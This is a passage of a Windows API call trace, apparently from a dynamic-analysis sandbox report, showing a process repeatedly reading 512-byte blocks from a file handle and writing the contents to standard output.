nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.645] GetFileType (hFile=0x50) returned 0x1 [0146.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.645] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.645] GetFileType (hFile=0x50) returned 0x1 [0146.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.645] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.645] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.645] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.645] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.645] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.645] GetFileType (hFile=0x50) returned 0x1 [0146.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.645] GetFileType (hFile=0x50) returned 0x1 [0146.645] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.645] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.646] GetFileType (hFile=0x50) returned 0x1 [0146.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.646] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.646] GetFileType (hFile=0x50) returned 0x1 [0146.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.646] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.646] GetFileType (hFile=0x50) returned 0x1 [0146.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.646] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.646] GetFileType (hFile=0x50) returned 0x1 [0146.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.646] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.646] GetFileType (hFile=0x50) returned 0x1 [0146.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.646] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.646] GetFileType (hFile=0x50) returned 0x1 [0146.646] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.646] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.646] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.646] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.647] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.647] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.647] GetFileType (hFile=0x50) returned 0x1 [0146.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.647] GetFileType (hFile=0x50) returned 0x1 [0146.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.647] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.647] GetFileType (hFile=0x50) returned 0x1 [0146.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.647] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.647] GetFileType (hFile=0x50) returned 0x1 [0146.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.647] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.647] GetFileType (hFile=0x50) returned 0x1 [0146.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.647] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.647] GetFileType (hFile=0x50) returned 0x1 [0146.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.647] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.647] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.647] GetFileType (hFile=0x50) returned 0x1 [0146.648] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.648] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.648] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.648] GetFileType (hFile=0x50) returned 0x1 [0146.648] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.648] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.648] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.648] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.648] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.648] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.648] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.648] GetFileType (hFile=0x50) returned 0x1 [0146.648] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.648] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.648] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.649] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.649] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.649] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.649] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.649] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.649] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.649] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.649] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.649] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.649] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.650] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.650] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.650] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.650] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.650] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.650] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.650] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.650] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.650] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.650] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.650] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.651] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.651] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.651] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.651] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.651] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.651] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.651] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.651] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.651] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.652] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.652] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.652] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.652] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.652] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.652] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.652] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.652] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.652] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.652] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.653] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.653] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.653] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.653] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.653] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.653] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.653] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.653] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.653] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.653] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.654] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.654] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.654] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.654] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.654] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.654] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.654] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.654] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.654] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.654] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.654] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.655] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.655] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.655] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.655] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.655] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 